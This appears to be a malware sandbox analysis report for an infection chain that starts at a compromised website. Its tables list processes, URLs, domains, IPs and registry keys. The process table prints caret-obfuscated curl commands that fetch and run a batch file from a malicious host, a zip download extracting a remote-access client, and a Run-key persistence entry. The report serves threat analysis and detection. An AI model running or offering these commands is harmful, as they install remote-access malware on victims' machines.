|
There are 239 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService
--lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:8
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US
--service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
--variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
|
|
|
|
C:\Windows\System32\osk.exe
|
"C:\Windows\system32\osk.exe"
|
|
|
|
C:\Windows\System32\osk.exe
|
"C:\Windows\system32\osk.exe"
|
|
|
|
C:\Windows\explorer.exe
|
C:\Windows\Explorer.EXE
|
|
|
|
C:\Windows\System32\conhost.exe
|
"C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php"
-o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
&& start /min "" C:\ProgramData\cvcv.bat Enter
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Users\user\AppData\Roaming\Dire\client32.exe
|
"C:\Users\user\AppData\Roaming\Dire\client32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
"C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php"
-o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
&& start /min "" C:\ProgramData\cvcv.bat Enter
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\conhost.exe
|
"C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php"
-o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
&& start /min "" C:\ProgramData\cvcv.bat Enter
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\curl.exe
|
curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
||
|
C:\Windows\System32\curl.exe
|
curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
|
||
|
C:\Windows\System32\tar.exe
|
tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"
|
||
|
C:\Windows\System32\reg.exe
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe"
/f
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
|
There are 23 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://fountainofhealth.ca
|
|
||
|
http://94.158.245.140/fakeurl.htm
|
94.158.245.140
|
|
|
|
https://www.stlchicago.com/header
|
unknown
|
|
|
|
https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8
|
unknown
|
||
|
https://www.stlchicago.com/header.phpk
|
unknown
|
||
|
https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0
|
unknown
|
||
|
https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0
|
unknown
|
||
|
https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8
|
unknown
|
||
|
http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoiba
|
unknown
|
||
|
http://geo.netsupportsoftware.com/location/loca.asp
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
|
unknown
|
||
|
https://kingdomholding.top/ss/index.php?FLeFJ5nY
|
79.141.162.149
|
||
|
https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
|
unknown
|
||
|
https://www.stlchicago.com/header.phpc
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
|
unknown
|
||
|
https://api.msn.com:443/v1/news/Feed/Windows?
|
unknown
|
||
|
https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
|
unknown
|
||
|
https://android.notify.windows.com/iOSsRN
|
unknown
|
||
|
https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
|
unknown
|
||
|
https://csp.withgoogle.com/csp/cloudview-release
|
unknown
|
||
|
http://epscd.catcert.net/crl/ec-acc.crl0.
|
unknown
|
||
|
https://www.stlchicago.com/header.phpR
|
unknown
|
||
|
https://www.stlchicago.com/header.phpP
|
unknown
|
||
|
https://www.google.com/dl/release2/chrome_component/adehgvka4qgdcbt6kjgfejd54juq_1331/efniojlnjndmcb
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
|
unknown
|
||
|
https://streams.videolan.org/upload/
|
unknown
|
||
|
https://fountainofhealth.ca/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0
|
unknown
|
||
|
http://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhob
|
unknown
|
||
|
https://fountainofhealth.ca/core/misc/dialog/dialog.position.js?v=10.1.0
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
|
unknown
|
||
|
https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbDriverData=C:
|
unknown
|
||
|
https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
|
unknown
|
||
|
https://www.theatlantic.com/politics/archive/2014/02/the-origin-of-liberalism/283780/
|
unknown
|
||
|
https://wns.windows.com/
|
unknown
|
||
|
http://support.steampowered.com
|
unknown
|
||
|
https://www.msn.com/en-us/news/politics/george-santos-former-campaign-treasurer-pleads-guilty-to-fed
|
unknown
|
||
|
https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0
|
unknown
|
||
|
https://www.stlchicago.com/header.phpt
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/WindyV2.svg
|
unknown
|
||
|
https://youtube.com/
|
unknown
|
||
|
https://fountainofhealth.ca/cdn-cgi/rum?
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
|
unknown
|
||
|
https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbWinsta0
|
unknown
|
||
|
http://www.autoitscript.com/autoit3/J
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png1.png
|
unknown
|
||
|
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/there-are-8-types-of-intelligence-which-one-is-yo
|
unknown
|
||
|
https://www.stlchicago.com/header.php$
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
|
unknown
|
||
|
https://wigreports.com/about/
|
unknown
|
||
|
https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbfC
|
unknown
|
||
|
https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws(
|
unknown
|
||
|
https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2E027DA2CDEC333310
|
unknown
|
||
|
http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
|
unknown
|
||
|
http://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfimg
|
unknown
|
||
|
http://127.0.0.1
|
unknown
|
||
|
https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmi
|
unknown
|
||
|
http://www.symauth.com/cps0(
|
unknown
|
||
|
https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
|
unknown
|
||
|
https://play.google.com/log?hasfast=true&authuser=0&format=jsonr
|
unknown
|
||
|
https://www.youtube.com/
|
unknown
|
||
|
https://wns.windows.com/32.dlllh
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V
|
unknown
|
||
|
https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
|
unknown
|
||
|
https://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagl
|
unknown
|
||
|
https://stacker.com/politics/states-most-conservatives-0
|
unknown
|
||
|
http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa
|
unknown
|
||
|
https://www.stlchicago.com/header.phpG
|
unknown
|
||
|
https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb4v
|
unknown
|
||
|
http://www.symauth.com/rpa00
|
unknown
|
||
|
https://fountainofhealth.ca/themes/bootstrap/js/tooltip.js?swwsy8
|
unknown
|
||
|
https://www.forbes.com/sites/elanagross/2020/10/28/trump-administration-uses-philadelphia-protests-t
|
unknown
|
||
|
https://api.msn.com/v1/news/Feed/Windows?activityId=BD3E37D8C4964A928E655AAA177D65C1&timeOut=5000&oc
|
unknown
|
||
|
https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbp
|
unknown
|
||
|
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
|
unknown
|
||
|
https://fountainofhealth.ca/core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8
|
unknown
|
||
|
https://kingdomholding.top/ss/fon.js
|
79.141.162.149
|
||
|
https://android.notify.windows.com/iOSte=Y_
|
unknown
|
||
|
https://www.msn.com/en-us/autos/buying/if-your-old-car-has-any-of-these-16-problems-consider-buying-
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
|
unknown
|
||
|
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ-dark
|
unknown
|
||
|
https://www.stlchicago.com/header.php2
|
unknown
|
||
|
https://fountainofhealth.ca/modules/google_analytics/js/google_analytics.js?v=10.1.0
|
unknown
|
||
|
https://fountainofhealth.ca/themes/bootstrap/js/popover.js?swwsy8
|
unknown
|
||
|
https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20%26%26%20start%20/mi
|
unknown
|
||
|
https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8H
|
unknown
|
||
|
https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8J
|
unknown
|
||
|
https://www.msn.com/en-us/news/politics/trump-asks-for-jan-6-dismissal-because-coup-attempt-was-part
|
unknown
|
||
|
https://www.stlchicago.com/header.php-oC:
|
unknown
|
||
|
https://drive.google.com/drive/installwebapp?usp=chrome_default
|
unknown
|
||
|
https://www.google.com/dl/release2/chrome_component/adsyhmqqe7lu5n7nvusq66g3hutq_9834/hfnkpimlhhgiea
|
unknown
|
||
|
https://www.msn.com/en-us/news/politics/the-state-with-the-most-liberals-isn-t-userfornia-or-new-yor
|
unknown
|
||
|
https://fountainofhealth.ca
|
unknown
|
||
|
https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0
|
unknown
|
||
|
https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8
|
unknown
|
||
|
http://schemas.micro
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
|
unknown
|
||
|
https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
|
unknown
|
||
|
https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
|
unknown
|
||
|
https://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckho
|
unknown
|
||
|
https://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfim
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
3dmaine.com
|
107.180.51.102
|
|
|
|
www.stlchicago.com
|
74.208.236.117
|
|
|
|
beacons3.gvt2.com
|
142.251.116.94
|
||
|
cdn.jsdelivr.net.cdn.cloudflare.net
|
104.16.175.226
|
||
|
a.nel.cloudflare.com
|
35.190.80.1
|
||
|
google.com
|
142.251.186.113
|
||
|
fountainofhealth.ca
|
172.67.207.68
|
||
|
static.cloudflareinsights.com
|
104.16.80.73
|
||
|
i.ytimg.com
|
142.250.113.119
|
||
|
beacons-handoff.gcp.gvt2.com
|
74.125.21.94
|
||
|
e2c12.gcp.gvt2.com
|
34.118.72.152
|
||
|
beacons2.gvt2.com
|
142.251.40.131
|
||
|
beacons.gvt2.com
|
192.178.153.94
|
||
|
static.doubleclick.net
|
142.250.138.149
|
||
|
beacons6.gvt2.com
|
173.194.208.94
|
||
|
youtube-ui.l.google.com
|
142.251.186.91
|
||
|
kingdomholding.top
|
79.141.162.149
|
||
|
googleads.g.doubleclick.net
|
142.251.186.155
|
||
|
play.google.com
|
142.250.113.101
|
||
|
beacons5.gvt2.com
|
216.239.32.116
|
||
|
photos-ugc.l.googleusercontent.com
|
142.251.186.132
|
||
|
gce-beacons.gcp.gvt2.com
|
35.241.26.164
|
||
|
www.google.com
|
173.194.208.106
|
||
|
beacons4.gvt2.com
|
216.239.32.116
|
||
|
yt3.ggpht.com
|
unknown
|
||
|
cdn.jsdelivr.net
|
unknown
|
||
|
beacons5.gvt3.com
|
unknown
|
||
|
beacons.gcp.gvt2.com
|
unknown
|
||
|
www.youtube.com
|
unknown
|
There are 19 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.16
|
unknown
|
unknown
|
|
|
|
94.158.245.140
|
unknown
|
Moldova Republic of
|
|
|
|
107.180.51.102
|
3dmaine.com
|
United States
|
|
|
|
74.208.236.117
|
www.stlchicago.com
|
United States
|
|
|
|
142.250.138.149
|
static.doubleclick.net
|
United States
|
||
|
142.250.115.119
|
unknown
|
United States
|
||
|
192.168.2.4
|
unknown
|
unknown
|
||
|
142.251.116.94
|
beacons3.gvt2.com
|
United States
|
||
|
104.16.80.73
|
static.cloudflareinsights.com
|
United States
|
||
|
142.250.113.119
|
i.ytimg.com
|
United States
|
||
|
142.251.186.91
|
youtube-ui.l.google.com
|
United States
|
||
|
172.67.207.68
|
fountainofhealth.ca
|
United States
|
||
|
35.190.80.1
|
a.nel.cloudflare.com
|
United States
|
||
|
142.251.186.136
|
unknown
|
United States
|
||
|
142.251.186.155
|
googleads.g.doubleclick.net
|
United States
|
||
|
142.251.186.132
|
photos-ugc.l.googleusercontent.com
|
United States
|
||
|
142.250.114.147
|
unknown
|
United States
|
||
|
79.141.162.149
|
kingdomholding.top
|
Bulgaria
|
||
|
173.194.208.106
|
www.google.com
|
United States
|
||
|
104.16.175.226
|
cdn.jsdelivr.net.cdn.cloudflare.net
|
United States
|
||
|
173.194.208.94
|
beacons6.gvt2.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
There are 12 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AccessibilityTemp
|
osk
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
|
@%SystemRoot%\system32\AccessibilityCPL.dll,-83
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
|
@%SystemRoot%\system32\AccessibilityCPL.dll,-84
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
|
@%SystemRoot%\system32\AccessibilityCPL.dll,-85
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility
|
Configuration
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1
|
SecureConfiguration
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1
|
Configuration
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
WindowLeft
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
WindowLeft
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
WindowTop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
WindowTop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
WindowWidth
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
WindowWidth
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
WindowHeight
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
WindowHeight
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ClickSound
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ClickSound
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
Mode
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
Mode
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
HoverPeriod
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
HoverPeriod
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ScanInterval
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ScanInterval
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
UseDevice
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
UseDevice
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
UseMouse
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
UseMouse
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
UseKB
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
UseKB
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ScanKey
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ScanKey
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
UseTextPrediction
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
UseTextPrediction
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
InsertSpace
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
InsertSpace
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ShowNumPad
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ShowNumPad
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
NavigationMode
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
NavigationMode
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ModeHeightNavigation
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ModeHeightNavigation
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ModeHeightGeneral
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ModeHeightGeneral
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
ShowClearKeyboard
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
ShowClearKeyboard
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
Dock
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\osk
|
Dock
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
WindowLeft
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
WindowTop
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
WindowWidth
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
WindowHeight
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ClickSound
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
Mode
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
HoverPeriod
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ScanInterval
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
UseDevice
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
UseMouse
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
UseKB
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ScanKey
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
UseTextPrediction
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
InsertSpace
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ShowNumPad
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
NavigationMode
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ModeHeightNavigation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ModeHeightGeneral
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
ShowClearKeyboard
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1\ATConfig\Osk
|
Dock
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AccessibilityTemp
|
osk
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
RunningState
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AccessibilityTemp
|
osk
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AccessibilityTemp
|
osk
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1
|
Configuration
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Osk
|
RunningState
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000502D8
|
VirtualDesktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000030336
|
VirtualDesktop
|
||
|
